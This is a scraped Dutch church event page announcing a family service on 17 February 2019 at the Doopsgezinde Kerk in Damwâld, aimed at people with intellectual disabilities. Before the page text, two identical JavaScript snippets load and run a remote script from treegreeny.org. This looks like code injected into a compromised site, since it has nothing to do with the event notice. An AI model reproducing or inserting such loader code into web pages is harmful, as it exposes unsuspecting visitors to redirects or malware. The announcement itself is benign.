;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... Welkom ! - PKN Damwâld
17 februari 2019
10:30 t/m 12:00
Doopsgezinde Kerk Damwâld
Bijzondere gezinsdienst … Welkom !

Zondagmorgen 17 februari 2019 bent u om 10.30 uur van harte welkom in de Doopsgezinde kerk, Doniawei 34 Damwâld  voor een bijzondere gezinsdienst. Pastor Ietsje de Boer gaat in op het thema ‘Iedereen is anders’. Na de dienst is er gezamenlijk koffiedrinken. Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: Doopsgezinde Kerk DamwâldDoniawei 34 Damwâld